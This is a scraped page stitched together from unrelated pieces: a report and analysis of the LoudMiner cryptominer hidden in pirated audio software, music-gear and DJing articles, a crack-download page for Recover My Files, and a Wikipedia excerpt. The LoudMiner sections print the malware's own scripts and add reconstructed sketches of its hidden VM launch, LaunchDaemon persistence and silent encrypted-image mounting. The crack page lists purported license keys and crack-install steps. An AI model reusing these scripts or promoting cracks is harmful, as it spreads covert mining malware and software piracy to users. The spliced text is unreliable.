Ableton Live Download Archives - Malik Softs


LoudMiner Cryptominer Uses Linux Image and Virtual Machines

An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology. It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine – a unique approach, according to researchers.

Virtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking pirated packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.

Upon downloading, an unwitting audiophile’s computer would be infected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three Mac versions and one Windows variant of the malware have been uncovered.

“Regarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,” wrote Michal Malik, researcher at ESET, in a posting on Thursday. “Thus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.”

Because the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.

“These applications are usually complex, so it is not unexpected for them to be huge files,” Malik explained. “The attackers use this to their advantage to camouflage their virtual machine (VM) images.”

Despite the efforts at camouflage, victims quickly become aware that something’s amiss, thanks to system slowdowns, according to forum postings.

“Unfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,” said a user named “Macloni.”

“The same user attached screenshots of the Activity Monitor indicating 2 processes – qemu-system-x86_64 and tools-service – taking 25 percent of CPU resources and running as root,” said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.

Using a Virtual Machine

LoudMiner uses QEMU on macOS and VirtualBox on Windows to connect to a Linux image running on a VM – more specifically, it’s a Tiny Core Linux 9.0 image configured to run XMRig. The victim’s machine is added to a mining pool that the Linux image uses for CPU power.
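To picture what that looks like in practice, here is a minimal, hedged sketch of the kind of headless QEMU launch such a setup implies; the binary path, image name and resource figures are illustrative assumptions, not the sample’s actual command line (portions of a real launcher script appear in the full ESET write-up below).

# Sketch only: boot a small Linux image invisibly under QEMU with hardware
# acceleration, one CPU core, 128 MB of RAM and no display window.
/usr/local/bin/qemu-system-x86_64 \
  -M accel=hvf -cpu host \
  -m 128 -smp 1 \
  -display none \
  "/Library/Application Support/.hidden/tinycore.qcow2"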

Malik noted that the decision by the malware authors to use VMs for the mining, instead of hosting it locally on the victim’s computer, is “quite remarkable and this is not something we routinely see” – although it’s not unheard of for legitimate miners to deploy the strategy to save money.

“User downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,” he explained. “LoudMiner hides itself and becomes persistent on reboot. The Linux virtual machine is launched and the mining starts. Scripts inside the virtual machine can contact the C2 server to update the miner.”

He said that in order to identify a particular mining session, a file containing the IP address of the machine and the day’s date is created by the “idgenerator” script, and its output is sent to the C2 server by the “updater.sh” script.
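The article names those scripts but does not reproduce them, so the following is only a rough sketch of what an “idgenerator”-style script could look like; the IP lookup service, output path and field layout are assumptions rather than ESET’s findings.

#!/bin/bash
# Hypothetical sketch: build a session identifier from the machine's public IP
# and today's date, for a separate updater script to report to the C2 server.
ip=$(curl -s https://ifconfig.me)
printf '%s_%s\n' "$ip" "$(date +%Y-%m-%d)" > /tmp/mining-session-id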

Because LoudMiner uses a mining pool, it’s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.

To avoid the threat, age-old advice applies: Don’t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, “additional” installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).
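For readers who want to screen a Mac against those red flags, a rough manual check might look like the following; the patterns are examples only, not an official or exhaustive detection method.

# Illustrative spot checks inspired by the red flags above.
ps aux | grep -iE 'qemu|virtualbox' | grep -v grep        # hypervisor processes you did not install
ls -lt /Library/LaunchDaemons | head                      # recently added startup services
lsof -i -nP | grep -iE 'system-update|system-check'       # connections to the curious domains named above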

 

M-Audio Code 49

49-Key USB MIDI Keyboard Controller with X/Y Touch Pad (16 Drum Pads / 9 Faders / 8 Encoders), VIP Software Download Included

Assignable Controllers

Extensive assignable parameter control is a breeze with multiple banks of faders, knobs, buttons, wheels and pads. New is the X/Y Touchpad, which provides direct interaction with effects and plugins.

Serious Production Power

Code supports Mackie Control/HUI control modes right out of the box. It also supports ASCII/HID keyboard shortcut commands. Mapping to your favorite DAW has never been so easy.

VIP 3.1 Integration

VIP provides you with unparalleled access to your virtual instrument and effect collection, seamlessly integrating the hardware/software experience and granting you the unrestricted freedom to create in a user-friendly, intuitive format.

All New Keyboard Editor

Download the free Code MIDI Editor to unlock the true potential of your Code 49. This MIDI editor is a powerful preset management software that lets users customize their hardware and software setup on their computer.

Ableton Live

I started DJing with Ableton Live after a couple of decades of playing out on CDJs and 1210s. I also own Traktor Pro 2 and I play out using Serato with vinyl too, so I’m certainly well placed to understand all the ups and downs of Ableton DJing – of which there are many of both! I should also add that for me the glass is always half full, and half the fun of a Scalextric was building the track itself!

As the creator of Isotonik and Oktopad, which are software templates for the Akai APC40 and Novation Launchpad respectively that work with Ableton Live via Max4Live, I believe I’ve created two tools that make DJing with Ableton Live easier and more fun – especially if, like most DJs, you come from the kind of background above. In this article, I’ll go through some of the philosophy behind my products, and look at specific ways they can help you to tame Ableton Live for DJing.

My take on DJing

For the traditional DJ, the advantages of Serato and Traktor are many. Personally, I was first attracted to the ability to carry my entire record collection in a single bag (my gym membership lapsed many years ago and my back isn’t what it used to be…). But I also embrace wholeheartedly all the new technology. Looping actions, doubling up tracks at the click of a button, cue-point juggling and bewildering effects can all add to the DJ’s ability to entertain a crowd. Some will use these subtly, while others have created whole genres out of making tracks unrecognisable from their original forms (check out Kutski or Kissy Sell Out on YouTube to hear what I mean).

(Incidentally, on the whole beatmatching thing, I’ve seen DJs who can and who can’t beatmatch both rock a crowd and fall flat. So I don’t care much for the argument that you have to know how to beatmatch to be able to DJ; you have to know how to DJ to be a DJ, and that for me is about being able to build a vibe and read a crowd. Glad to get that off my chest!)

So anyway, if Traktor and Serato can help you to do all of this, why consider Ableton Live in the first place? Serato Scratch Live can give you the real true vinyl feel, while Traktor is a Midi programmer’s dream. Surely between them they are all the digital DJ needs? Well not quite, as it turns out.

The Ableton advantage

Here are just a few benefits of DJing with Ableton Live:

  • User configurability – One of Ableton’s most appealing features. For instance, how about being able to create endless effects chains to distort or enhance your audio and possibly even create an effect never heard before?
  • Remixing your tracks live – If you’re a producer then you can reproduce your tracks in stems and mix them live. In this field there’s actually no competition for Ableton Live
  • Rearranging and perfectly phrasing every mix on the fly – As a DJ, Ableton’s Session mode can be hard to beat, giving far more possibilities than two or four decks. (Performance missing impact? Just trigger a white noise sample and filter out the lows until the bass kicks in…) True, Traktor and Serato have sample players, but nothing can beat Ableton’s practically infinite number of tracks
Isotonik in action on the Akai APC40.

Matched up with the right controller (buttons are important for triggering tracks, and encoders and faders are necessary for effects, so consider an APC40 or Launchpad / iPad combination; even a couple of Nano-style controllers can give you a full set-up from a backpack) and you can create a truly unique performance.

So where does Ableton lose out to its DJ controller and DVS cousins, and how can Max4Live along with my products help reduce that disadvantage? Let’s look at that question.

Ableton’s main shortcomings

There are two big shortcomings to Ableton that crop up again and again, but both can actually be seen in a positive light.

Warping
With an Ableton session you first have to “warp” all of the tracks you want to play (think beatgridding in Traktor or Serato). While things got simpler with Live 8’s new warping methodology, some users still complain that this isn’t as automatic as, say, Serato’s system which seems to hit the downbeat each and every time without much effort.

However, those of you who have been DJing for a number of years will recognise the benefit of knowing your tracks inside out. Initially the process of warping involves listening to your tracks a number of times, which has to be good for your DJing – and anyway, with a little experience a track can be warped in no more time than it takes to listen to it.

The browser
No question, Ableton’s browser is currently lacking. It’s small, and slow to respond to search requests. After a night smashing tune after tune out of Serato you’ll yearn for the simplicity of its browser and meta tag searching.

Ableton Live's browser

There are workarounds and some are ingenious in their approach but these feel more like hacks rather than a streamlined integrated solution. So instead many DJs choose to create a large template, containing every tune they think they’re going to be playing! Preparing such a template feels a little bit like packing a crate of tunes for a DJ session.

But when you come to think of it, focusing on your set before you turn up (just like vinyl DJs used to when packing a crate for the night) can actually be a very good thing.

Using Ableton Live with Max4Live

OK so we’ve coped with the shortcomings, realised the benefits, and we’re ready to start pushing the envelope with our DJing, doing things that leave the Traktor and Serato boys way behind. Here’s where Max4Live along with my software for the APC40 and Novation Launchpad helps you to better use Ableton Live as a DJ.

Max for Live is best seen as a toolkit for adding new behaviours to Ableton Live. My products – Isotonik and Oktopad – are templates for the Akai APC40 and Novation Launchpad that use this toolkit to put some pretty cool stuff in your hands.

Easier DJing with parts and sections
Ableton guru Tom Cosm championed what he called his “megaset” DJing principle, where each full track is split into its relevant parts – intro, drums, break, vocal etc. This is a popular way of using Ableton Live for DJing, as you can really get stuck into remixing on the fly, get a visible indication of where you are in a track, and have the ability to create infinite cue points.

Although Serato has just upped its game with the ability to name cue points, you’re limited to five in total, and while Traktor Pro 2.5 with the new Kontrol F1 controller is again nodding in Ableton’s direction, we have yet to see how that system will pan out. However, the downside of using Ableton this way comes when triggering the following clip. Currently you can set “follow actions” within each clip in Ableton, choosing from a number of defined actions to occur after a certain number of bars, beats and units from when the clip initially started.

Megaset Principle

With a little bit of effort this can be done quickly, but each clip needs to be set separately, and if in the middle of a clip you decide to engage a loop, then your follow action will occur at the originally set time regardless of the fact that the clip has not reached its end.

So here’s where Max4Live comes in. It circumvents this limitation in Ableton by keeping an eye on where you actually are in a clip no matter what you’re doing, and only triggering the next clip when you actually reach the end. No follow actions, no lengthy set-up and the ability to perform looping within tracks!

Better looping
Ableton offers a great deal of configurability for Midi Mapping (not as much as Traktor admittedly, but easily equalled when using a third-party utility such as Bome’s Midi Translator). However, much of what can be mapped relies on what is in focus.

For instance, you can map a Midi controller to set a loop start and end point and toggle the loop on and off; however, you can only do this on the clip that’s in focus. Therefore, to loop a clip you’d have to navigate to it first – unnecessary mouse-pushing which, in a dark venue and with a glowing screen, can lead to that “just checking Facebook” look. Wouldn’t pressing a single button to set a four-bar loop be much more preferable?

Again, Max4Live to the rescue! With Max4Live you can send messages to hidden parameters. Once you understand the nuances of getting the message order right, it’s ultimately possible to set up on-the-fly looping for the eight tracks within the Novation Launchpad’s Clip Launch rectangle (the 8×8 grid of clips that can be triggered from the pads of the Launchpad), setting loops and halving, doubling and moving them with even more control than either Traktor or Serato.

Nudge, nudge…
Having each clip pre-warped, you’ll never have a clashed beat again! Well, almost…

Sometimes, no matter how well you warp a clip, it’ll just not sit right with another clip’s bassline or hi-hats. On a pair of turntables, jogwheels or touchstrips you’d just give the offending track a little nudge to bring things sonically back into line. Unfortunately, with Ableton it’s not as straightforward. Ableton has a Midi-mappable set of nudge buttons, but like the looping functionality you can only nudge the clip in focus. Plus, it will also only perform a nudge in the size of the current Global Launch quantize.

The Novation Launchpad

Once again, you’ve got multiple button presses to contend with: change quantization to none, focus on the clip and then nudge. All a far cry from reaching out your right hand and holding two fingers against the platter of a 1210…

But once again, Max4Live to the rescue! By sending a simple message to the playing clip with a value of 0.01, you’ll be back to one physical action to achieve the nudging result – just like the + and – buttons on a Denon CD player.

Here’s a bonus: Ever started a track a bar too late or early? Well simply ask Max4Live to jump forwards or back a bar! Again, it’s simple, one-click stuff.

Mixing in key
Many digital musicians love mixing in key, analysing their music files for key and colour coding them in Ableton according to the Camelot wheel for easy harmonic mixing and mashups. Well, for them, the ability of Max4Live to change the pitch of a clip on the fly brings brand new mashup possibilities to the fore, with an endless number of a cappellas now becoming suitable to lay over virtually any instrumental.

Finally…

I made Isotonik and Oktopad because I love the creative possibilities of Ableton Live but wanted to address some of these very real concerns that DJs moving across from other systems have with the program. However, it’s not for everyone. Ableton is still a far cry from two-decks-and-a-mixer. Hopefully Max4Live with the APC40 or Launchpad and my templates makes it easier and more fun, but the truth is, you’ll never finish building your source tunes template, and with this and other issues, it’ll own your life, ruin your relationships, and see you end up with friends that you only recognise through their avatar on a forum!

I can’t do anything about all of that, I’m afraid – and I can’t bring parallel waveforms back for you, either. Apart from that, though, for the adventurous DJ, Ableton Live plus Max4Live with Isotonik and/or Oktopad does, in my opinion, present the most powerful DJing platform out there today.

• Isotonik and Oktopad are fully featured templates for the Akai APC40 and Launchpad respectively. Subscribers benefit from a steady stream of updates as new functionality is requested and realised. More details and videos can be found at Darren’s website, and subscribers can get involved on his Facebook Page.

Have you tried or considered Ableton Live DJing? Do you currently DJ with Ableton Live? What are your experiences of Ableton, Max4Live, or Darren’s templates? Please share your thoughts in the comments.

The Wire

Every back issue of The Wire is now available to all our subscribers online and via the iPad, iPhone and Android apps. That’s more than 350 issues and 25,000 pages of underground and experimental music history – a unique archive containing issues of the magazine that in some cases have been unavailable for up to three decades.

Up until now, subscribers have only been able to access monthly digital editions of the magazine going back to August 2006 – now they can view and read every issue going back to issue one and summer 1982. The entire archive is searchable, of course, so you can locate any and every article and review ever published by the magazine on specific musicians, groups or genres, or by key critics and contributors.

The Wire archive will be an essential resource for anyone who's into underground music, one that will continue to expand as each new issue of the magazine is added to it.

If you order a print subscription you get automatic access to the digital archive. Digital-only subscriptions are also available. For more details and prices click here.


LoudMiner: Cross‑platform mining in cracked VST software

The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS

LoudMiner is an unusual case of a persistent cryptocurrency miner, distributed for macOS and Windows since August 2018. It uses virtualization software – QEMU on macOS and VirtualBox on Windows – to mine cryptocurrency on a Tiny Core Linux virtual machine, making it cross platform. It comes bundled with pirated copies of VST software. The miner itself is based on XMRig (Monero) and uses a mining pool, thus it is impossible to retrace potential transactions.

At the time of writing, there are 137 VST-related applications (42 for Windows and 95 for macOS) available on a single WordPress-based website with a domain registered on 24 August, 2018. The first application – Kontakt Native Instruments 5.7 for Windows – was uploaded on the same day. The size of the apps makes it impractical to analyze them all, but it seems safe to assume they are all Trojanized.

The applications themselves are not hosted on the WordPress-based site, but on 29 external servers, which can be found in the IoCs section. The admins of the site also frequently update the applications with newer versions, making it difficult to track the very first version of the miner.

Regarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production; thus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users. Also, these applications are usually complex, so it is not unexpected for them to be huge files. The attackers use this to their advantage to camouflage their VM images. Moreover, the decision to use virtual machines instead of a leaner solution is quite remarkable and this is not something we routinely see.

Here are some examples of applications, as well as some comments you can find on the website:

  • Propellerhead Reason
  • Ableton Live
  • Sylenth1
  • Nexus
  • Reaktor 6
  • AutoTune

Figure 1. Comment #1 from the “admin”

Figure 2. Comment #2 from the “admin”

We found several forum threads of users complaining about a qemu-system-x86_64 process taking 100% of their CPU on their Mac:

Figure 3. User report #1 (https://discussions.apple.com/thread/250064603)

Figure 4. User report #2 (https://toster.ru/q/608325)

A user named “Macloni” (https://discussions.apple.com/thread/8602989) said the following:

“Unfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this.” The same user attached screenshots of the Activity Monitor indicating 2 processes – qemu-system-x86_64 and tools-service – taking 25% of CPU resources and running as root.

The general idea of both macOS and Windows analyses stays the same:

  1. An application is bundled with virtualization software, a Linux image and additional files used to achieve persistence.
  2. User downloads the application and follows attached instructions on how to install it.
  3. LoudMiner is installed first, the actual VST software after.
  4. LoudMiner hides itself and becomes persistent on reboot.
  5. The Linux virtual machine is launched and the mining starts.
  6. Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries).

While analyzing the different applications, we’ve identified four versions of the miner, mostly based on how it’s bundled with the actual software, the C&C server domain, and something we believe is a version string created by the author.

macOS

We’ve identified three macOS versions of this malware so far. All of them include dependencies needed to run QEMU in installerdata.dmg, from which all files are copied over to /usr/local/bin and have appropriate permissions set along the way. Each version of the miner can run two images at once, each taking 128 MB of RAM and one CPU core. Persistence is achieved by adding plist files in /Library/LaunchDaemons with RunAtLoad set to true. They also have KeepAlive set to true, ensuring the process will be restarted if stopped (a generic sketch of such a plist follows the list below). Each version has these components:

  1. QEMU Linux images.
  2. Shell scripts used to launch the QEMU images.
  3. Daemons used to start the shell scripts at boot and keep them running.
  4. A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running.
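For readers unfamiliar with launchd, a generic sketch of a daemon definition using the RunAtLoad and KeepAlive keys described above looks roughly like this; the label and script path are invented for illustration and are not taken from the analysed samples.

# Illustration only: register a launchd daemon that starts a launcher script at
# boot (RunAtLoad) and restarts it whenever it exits (KeepAlive).
cat > /Library/LaunchDaemons/com.example.qemuservice.plist <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key><string>com.example.qemuservice</string>
    <key>ProgramArguments</key><array><string>/usr/local/bin/qemu-launcher.sh</string></array>
    <key>RunAtLoad</key><true/>
    <key>KeepAlive</key><true/>
</dict>
</plist>
EOF
launchctl load -w /Library/LaunchDaemons/com.example.qemuservice.plist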

The CPU monitor script can start and stop the mining by loading and unloading the daemon. If the Activity Monitor process is running, the mining stops. Otherwise, it checks how long the system has been idle, in seconds, by querying ioreg -c IOHIDSystem.
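Idle time on macOS can be read from that same IOHIDSystem registry entry; the one-liner below is a common, generic way of doing so and is shown purely as an illustration, not as the malware’s recovered script.

# HIDIdleTime is reported in nanoseconds; divide by 10^9 to get idle seconds.
idle_seconds=$(ioreg -c IOHIDSystem | awk '/HIDIdleTime/ {print int($NF/1000000000); exit}')
echo "$idle_seconds"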

if [ $LGC -ge 2 ]
then
launchctl unload -w /Library/LaunchDaemons/com.modulesys.qemuservice.plist
launchctl unload -w /Library/LaunchDaemons/com.buildtools.tools-service.plist
launchctl unload -w /Library/LaunchDaemons/com.buildtools.system-monitor.plist
launchctl unload -w /Library/LaunchDaemons/com.systools.cpumonitor.plist
rm -f /Library/LaunchDaemons/com.buildtools.system-monitor.plist
rm -f /Library/LaunchDaemons/com.modulesys.qemuservice.plist
rm -f /Library/LaunchDaemons/com.buildtools.tools-service.plist
rm -f /Library/LaunchDaemons/com.systools.cpumonitor.plist
rm -rf /Library/Application\ Support/.Qemusys
rm -rf /usr/local/bin/.Tools-Service
rm -rf /Library/Application\ Support/.System-Monitor/
rm -rf /usr/local/*
fi
exit 0
}
clear;

Script 2. data_installer.pkg preinstall script that removes version 1

Version 2

The following temporary files are created:

  • /Users/Shared
    • z1 – QEMU binary
    • z1.daemon – launches the QEMU image with the QEMU binary
    • z1.qcow2 – QEMU image
    • z1.plist – launches z1.daemon
    • z3 – CPU monitor script, little change from version 1 cpumonitor
    • z3.plist – used to launch z3
    • randwd – generates random names

After dependencies are copied over, the miner is installed. This time the names of QEMU binaries, plists and directories are randomized with the randwd script. The miner installation creates two copies of z1, z1.daemon, z1.qcow2 and z1.plist. For each copy, the following happens:

  • A directory with a random name is created in /Library/Application Support
  • The QEMU binary z1 carries the same name as the directory and is copied into /usr/local/bin
  • z1.daemon (see listing in Script 3) and z1.qcow2 are copied into this directory under their random names
  • z1.plist is copied with the name com.<random_name>.plist into /Library/LaunchDaemons

z1.daemon, z1.plist, z3 and z3.plist files serve as templates. References to other scripts, binaries, plists, etc. in these files are replaced by their corresponding generated random name.
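That substitution step can be pictured roughly as follows; the placeholder token, the sed call and the destination path are assumptions made for illustration, not the installer’s recovered code.

# Hypothetical sketch: stamp a freshly generated random name into a template
# daemon script, then write it out under that randomized name.
name=$(/Users/Shared/randwd)        # randwd is named in the report; its contents are not shown here
mkdir -p "/Library/Application Support/${name}"
sed "s/BBBB/${name}/g" /Users/Shared/z1.daemon > "/Library/Application Support/${name}/${name}"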

A random name is also chosen for the CPU monitor (z3) shell script and its accompanying plist file. z3 is copied into /usr/local/bin and the plist into /Library/LaunchDaemons under the name com.<random_name>.plist.

#!/bin/bash
function start {
pgrep "Activity Monitor"
if [ $? -eq 0 ]; then
launchctl unload -w /Library/LaunchDaemons/com.AAAA.plist
else
/usr/local/bin/BBBB -M accel=hvf -cpu host /Library/Application\ Support/CCCC/DDDD -display none
fi
}
start;

Script 3. z1.daemon shell script

Version 2 is a bit cleaner and/or simpler than version 1. There is only one QEMU image, with two copies made; same for the image launcher scripts, daemons and the cpumonitor. Even though version 2 randomizes its filenames and directories, it can only be installed once because the installation checks for running processes with accel=hvf in their command line.
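A plausible shape for that single-install check is a simple process scan along these lines (an illustrative guess at the mechanism, not decompiled logic):

# If a process already runs with accel=hvf on its command line, assume a miner
# VM is active and skip installing a second copy.
if pgrep -f 'accel=hvf' > /dev/null; then
    exit 0
fi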

From the version 2 applications we’ve checked so far, the SHA1 hash of the data_installer.pkg is always 39a7e86368f0e68a86cce975fd9d8c254a86ed93.

Version 3

The miner files are in an encrypted DMG file, called do.dmg, inside the application package. The DMG is mounted with the following command:

printf '%s\0' 'VeryEasyPass123!'
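The listing stops at the printf; for context, a passphrase emitted this way is typically piped straight into hdiutil so that an encrypted image mounts without an interactive prompt. The full command below is therefore an assumption about the general technique, not a quote from the report.

# Illustration of the technique: feed a null-terminated password to hdiutil
# and mount the encrypted disk image without showing it in the Finder.
printf '%s\0' 'VeryEasyPass123!' | hdiutil attach -stdinpass -nobrowse do.dmg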

Recover My Files 6.3.2.3 Crack With Torrent Download (New) 2022

Generally, the Recover My Files License Key is useful in two basic data-loss situations: data lost because of a sudden crash, and data lost because the drive was reformatted. In both cases, this program works quickly and preserves the original quality of the recovered files. It works impressively to recover data of any file type from reformatted hard drives, covering formats such as jpg, doc, mp3, pst, xls, and so on.

This is a trusted and secure data recovery application that helps handle all kinds of data-loss problems. Moreover, it supports recovery of an assortment of files as well as single-file recovery, including project documents and important messages. Recover My Files Crack has extraordinary abilities to get back everything that is gone. It takes only a short time to scan the entire system, and you can pause or restart the scanning whenever you need to.


Effective and Useful Features:

Fast Scanning: 

  • It begins scanning to find everything that was lost for reasons such as an abrupt crash, system failure, virus attacks, and so on.

Supported Devices: 

  • As the best recovery application, it presents an easy technique to recover data from a wide range of devices. Thus, you can get back data from camera cards, hard drives, USB drives, iPods, floppy disks, and many others.

UI: 

  • This is the best element for boosting the user's confidence while working: a well-organised interface with all the tools required for data recovery. 

Fast Recovery: 

  • The product works magnificently at a decent speed, so there is no need to put up with a boring or lengthy recovery process. Simply install the most recent version from here and enjoy fast recovery of all sorts of files. 

Disk recovery: 

  • Recover My Files Torrent is fully able to recover data even in the case of a hard disk crash.

Some Others Features:

  • Recover My Files Full Crack also supports multi-screen setups.
  • Arrange the various files according to their size, date, and attributes.
  • Improvements to save as well as load custom screen layouts.
  • Recover memorable photos, birthday videos, messages, and call history.
  • An excellent option is here to recover from the RAW hard drives.
  • Also, the interesting thing is that it can recuperate the business email.
  • Supports getting data back from NTFS, FAT, exFAT, HFS, and much more.
  • Get back data even if you have emptied the Recycle Bin.
  • Recover any type of data in case of partition error.

What’s New?

  • Enhanced partition recovery
  • Improvements for the validation of invalid or duplicate data
  • Enhanced speed when saving or loading the resulting contents
  • A lot of improvements in the user interface
  • Possibility to view grouped data by date, extension, and status
  • Examine the raw data in hexadecimal and text views
  • Supports the 300+ file types

System Requirements:

  • 1 GHz processor for good performance
  • 512 MB RAM
  • A free disk space of approximately 50 MB for installation
  • Windows 7, 8, 8.1, and 10 with 32/64 Bit system

Recover My Files License Key 2022:

DFTVHJNMRDHKYFSMJKIU

MKIVGFCFSTTESXCXZSAEN

UTGFTRDESABDSAAWDXXU

How to Activate?

  • Download Recover My Files Crack from the link on the page,
  • Run the setup file and let Recover My Files Crack install
  • After installation, open the installation folder,
  • Copy the crack folder and move to Recover My Files in the installation,
  • Use the Crack to unlock the premium features,
  • Now Enjoy Recover My Files full and free version.

Wikipedia

Multilingual free online encyclopedia

This article is about Wikipedia. For Wikipedia's home page, see Main Page. For the English edition, see English Wikipedia. For a list of Wikipedias in other languages, see List of Wikipedias. For other uses, see Wikipedia (disambiguation).

Wikipedia (wik-ih-PEE-dee-ə or wik-ee-) is a free content, multilingual online encyclopedia written and maintained by a community of volunteers through a model of open collaboration, using a wiki-based editing system. Individual contributors, also called editors, are known as Wikipedians. It is the largest and most-read reference work in history,[3] and consistently one of the 15 most popular websites ranked by Alexa; as of 2021, Wikipedia was ranked the 13th most popular site.[3][4] A visitor spends an average time on Wikipedia of 3 minutes and 45 seconds each day.[5] It is hosted by the Wikimedia Foundation, an American non-profit organization funded mainly through small donations.[6]

Wikipedia was launched on January 15, 2001, by Jimmy Wales[7] and Larry Sanger; Sanger coined its name as a blending of "wiki" and "encyclopedia".[8] Initially available only in English, versions in other languages were quickly developed. Its combined editions comprise more than 57 million articles, attracting around 2 billion unique device visits per month, and more than 17 million edits per month (1.9 edits per second).[10][11] In 2006, Time magazine stated that the policy of allowing anyone to edit had made Wikipedia the "biggest (and perhaps best) encyclopedia in the world", and is "a testament to the vision of one man, Jimmy Wales".[12]

Wikipedia has received praise for its enablement of the democratization of knowledge, extent of coverage, unique structure, culture, and reduced amount of commercial bias, but criticism for exhibiting systemic bias, particularly gender bias against women and alleged ideological bias.[13][14] Its reliability was frequently criticized in the 2000s, but has improved over time and has been generally praised in the late 2010s and early 2020s.[3][13][15] Its coverage of controversial topics such as American politics and major events such as the COVID-19 pandemic has received substantial media attention. It has been censored by world governments, ranging from specific pages to the entire site. It has become an element of popular culture, with references in books, films and academic studies. In 2018, Facebook and YouTube announced that they would help users detect fake news by suggesting fact-checking links to related Wikipedia articles.[16][17]

History

Main article: History of Wikipedia

Nupedia

Main article: Nupedia

Logo reading "Nupedia.com the free encyclopedia" in blue with the large initial "N"
Wikipedia originally developed from another encyclopedia project called Nupedia.

Other collaborative online encyclopedias were attempted before Wikipedia, but none were as successful.[18] Wikipedia began as a complementary project for Nupedia, a free online English-language encyclopedia project whose articles were written by experts and reviewed under a formal process.[19] It was founded on March 9, 2000, under the ownership of Bomis, a web portal company. Its main figures were Bomis CEO Jimmy Wales and Larry Sanger, editor-in-chief for Nupedia and later Wikipedia.[1][20] Nupedia was initially licensed under its own Nupedia Open Content License, but even before Wikipedia was founded, Nupedia switched to the GNU Free Documentation License at the urging of Richard Stallman.[21] Wales is credited with defining the goal of making a publicly editable encyclopedia,[22][23] while Sanger is credited with the strategy of using a wiki to reach that goal.[24] On January 10, 2001, Sanger proposed on the Nupedia mailing list to create a wiki as a "feeder" project for Nupedia.[25]

Launch and early growth

The domains wikipedia.com (later redirecting to wikipedia.org) and wikipedia.org were registered on January 12, 2001,[26] and January 13, 2001,[27] respectively, and Wikipedia was launched on January 15, 2001[19] as a single English-language edition at www.wikipedia.com,[28] and announced by Sanger on the Nupedia mailing list.[22] Its policy of "neutral point-of-view"[29] was codified in its first few months. Otherwise, there were initially relatively few rules, and it operated independently of Nupedia.[22] Bomis originally intended it as a business for profit.[30]

The Wikipedia home page on December 20, 2001

English Wikipedia editors with >100 edits per month[31]

Wikipedia gained early contributors from Nupedia, Slashdot postings, and web search engine indexing. Language editions were also created, with a total of 161 by the end of 2004.[33] Nupedia and Wikipedia coexisted until the former's servers were taken down permanently in 2003, and its text was incorporated into Wikipedia. The English Wikipedia passed the mark of two million articles on September 9, 2007, making it the largest encyclopedia ever assembled, surpassing the Yongle Encyclopedia made during the Ming Dynasty in 1408, which had held the record for almost 600 years.[34]

Citing fears of commercial advertising and lack of control, users of the Spanish Wikipedia forked from Wikipedia to create Enciclopedia Libre in February 2002.[35] Wales then announced that Wikipedia would not display advertisements, and changed Wikipedia's domain from wikipedia.com to wikipedia.org.[36][37]

Though the English Wikipedia reached three million articles in August 2009, the growth of the edition, in terms of the numbers of new articles and of editors, appears to have peaked around early 2007.[38] Around 1,800 articles were added daily to the encyclopedia in 2006; by 2013 that average was roughly 800.[39] A team at the Palo Alto Research Center attributed this slowing of growth to the project's increasing exclusivity and resistance to change.[40] Others suggest that the growth is flattening naturally because articles that could be called "low-hanging fruit"—topics that clearly merit an article—have already been created and built up extensively.[41][42][43]

In November 2009, a researcher at the Rey Juan Carlos University in Madrid found that the English Wikipedia had lost 49,000 editors during the first three months of 2009; in comparison, it lost only 4,900 editors during the same period in 2008.[44][45] The Wall Street Journal cited the array of rules applied to editing and disputes related to such content among the reasons for this trend.[46] Wales disputed these claims in 2009, denying the decline and questioning the study's methodology.[47] Two years later, in 2011, he acknowledged a slight decline, noting a decrease from "a little more than 36,000 writers" in June 2010 to 35,800 in June 2011. In the same interview, he also claimed the number of editors was "stable and sustainable".[48] A 2013 MIT Technology Review article, "The Decline of Wikipedia", questioned this claim, revealing that since 2007, Wikipedia had lost a third of its volunteer editors, and that those remaining had focused increasingly on minutiae.[49] In July 2012, The Atlantic reported that the number of administrators was also in decline.[50] In the November 25, 2013, issue of New York magazine, Katherine Ward stated, "Wikipedia, the sixth-most-used website, is facing an internal crisis."[51]

Milestones

Cartogram showing the number of articles in each European language as of January 2019. One square represents 10,000 articles. Languages with fewer than 10,000 articles are represented by one square. Languages are grouped by language family and each language family is presented by a separate color.

In January 2007, Wikipedia first became one of the ten most popular websites in the US, according to comScore Networks. With 42.9 million unique visitors, it was ranked #9, surpassing The New York Times (#10) and Apple (#11). This marked a significant increase over January 2006, when Wikipedia ranked 33rd, with around 18.3 million unique visitors.[52] As of March 2020, it ranked 13th[4] in popularity according to Alexa Internet. In 2014, it received eight billion page views every month.[53] On February 9, 2014, The New York Times reported that Wikipedia had 18 billion page views and nearly 500 million unique visitors a month, "according to the ratings firm comScore".[10] Loveland and Reagle argue that, in process, Wikipedia follows a long tradition of historical encyclopedias that have accumulated improvements piecemeal through "stigmergic accumulation".[54][55]

